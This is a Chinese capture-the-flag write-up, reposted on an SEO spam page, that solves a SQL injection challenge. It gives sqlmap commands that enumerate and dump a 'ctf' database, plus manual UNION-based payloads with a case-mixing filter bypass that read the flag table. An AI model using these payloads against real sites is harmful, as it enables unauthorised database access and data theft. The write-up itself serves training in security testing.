当前位置: 首页 > wzjs >正文

肇庆网站建设解决方案seo推广方法集合

肇庆网站建设解决方案,seo推广方法集合,网站建设需要多少钱知乎,零基础网站建设书籍题目: 发现id处可以sql注入: 虽然输入id1;show databases;#没什么回显,但是知道这里是字符型注入了 这次利用sqlmap注入 --dbs:列出所有数据库名字 python .\sqlmap.py -u http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.…

题目:

发现id处可以sql注入:

虽然输入id=1';show databases;#没什么回显,但是知道这里是字符型注入了

这次利用sqlmap注入

--dbs:列出所有数据库名字
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --dbs

--current-db:当前数据库
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --current-db

显示表名
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' --tables

--dump:显示文段内容
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' -T 'here_is_flag' --dump

 其他手动SQL注入方法

利用大小写绕过

/?id=1' Order by 5 --+
/?id=1' Union SELect 1,version(),user(),database(),5  --+

?id=' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+
?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+
http://www.dtcms.com/wzjs/258082.html

相关文章:

  • 中通建设工程管理公司网站品牌推广方案
  • 东莞百姓网招聘网站seo标题优化技巧
  • 微博推广费用seo快速排名工具
  • 宠物店网站开发文档撰写网店搜索引擎优化的方法
  • 什邡网站建设公司查域名
  • 南京h5 网站建设seo外链在线工具
  • 网站详情页用cdr做可以吗石家庄网站建设排名
  • 陕西有没有做网站普查公司短网址链接生成
  • 手机做网站怎么做建网站公司哪里好
  • 杭州代办营业执照的正规公司廊坊seo关键词优化
  • 沈阳做企业网站的信息流投放平台
  • 首次建设网站流程图百度网站大全旧版
  • 沈阳微营销网站制作磁力链bt磁力天堂
  • 汽车网站建设流程广州从化发布
  • 郑州专业网站推广优化公司郑州seo线上推广技术
  • 电商客服怎么做如何从零开始下载优化大师并安装
  • 网站加强队伍建设推推蛙品牌策划
  • 西安教育平台网站建设点金推广优化公司
  • 网站开发过程阶段全国31省市疫情最新消息今天
  • 东莞市建设安监监督网站百度点击软件名风
  • 珠海网站建设最新报价合肥优化
  • 商务网站建设与维护 试题seo运营学校
  • 免费简历模板制作网站有哪些推广平台和渠道
  • 网站开发中如何制作登录页面seo网络优化前景怎么样
  • 德阳网站怎么做seo杭州数据推广
  • 广州做网站推广公司seo薪资水平
  • 大型手游网络游戏排行榜北京seo执行
  • 朝阳区住房建设委网站域名注册查询系统
  • web网站开发作业企业网站的类型
  • 商业网站推荐关键词seo优化软件